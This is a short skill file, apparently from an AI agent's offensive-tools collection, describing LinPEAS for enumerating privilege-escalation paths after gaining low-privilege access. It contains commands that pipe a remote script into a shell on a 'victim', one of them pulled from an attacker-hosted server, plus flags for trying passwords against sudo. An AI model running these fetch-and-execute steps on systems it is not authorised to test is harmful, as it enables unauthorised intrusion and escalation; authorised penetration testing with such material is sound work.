offensive-tools/privilege-escalation/linpeas/SKILL.md
LinPEAS: automated bash script enumerating Linux/macOS privilege escalation vectors including SUID binaries, writable paths, weak service configs, cron jobs, sudo rules, and kernel CVE indicators. Use post-exploitation as a low-privilege user on Linux or macOS to identify escalation paths.
Linux/macOS privilege escalation enumeration script.
```bash
# Download and run directly (victim with internet)
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Host and deliver from attacker box
python3 -m http.server 8000                  # attacker
curl http://ATTACKER:8000/linpeas.sh | sh    # victim

# Save output for review
./linpeas.sh -a 2>&1 | tee linpeas.out
```

| Flag | Purpose |
|------|---------|
| -a | All checks (thorough) |
| -q | Quiet mode |
| -s | SuperFast — skip slow checks |
| -P <pass> | Try password against sudo prompts |

| Section | What it finds |
|---------|--------------|
| System info | OS/kernel version, CVE indicators |
| Users & groups | Sudo perms, passwd/shadow leaks |
| Files | SUID binaries, world-writable root dirs |
| Cron | World-writable cron scripts |
| Network | Open local ports, hosts file |
| Services | Weak permissions on service binaries |

99% PE — lines first

| File | When to load |
|------|--------------|
| references/ | Manual exploitation of common findings |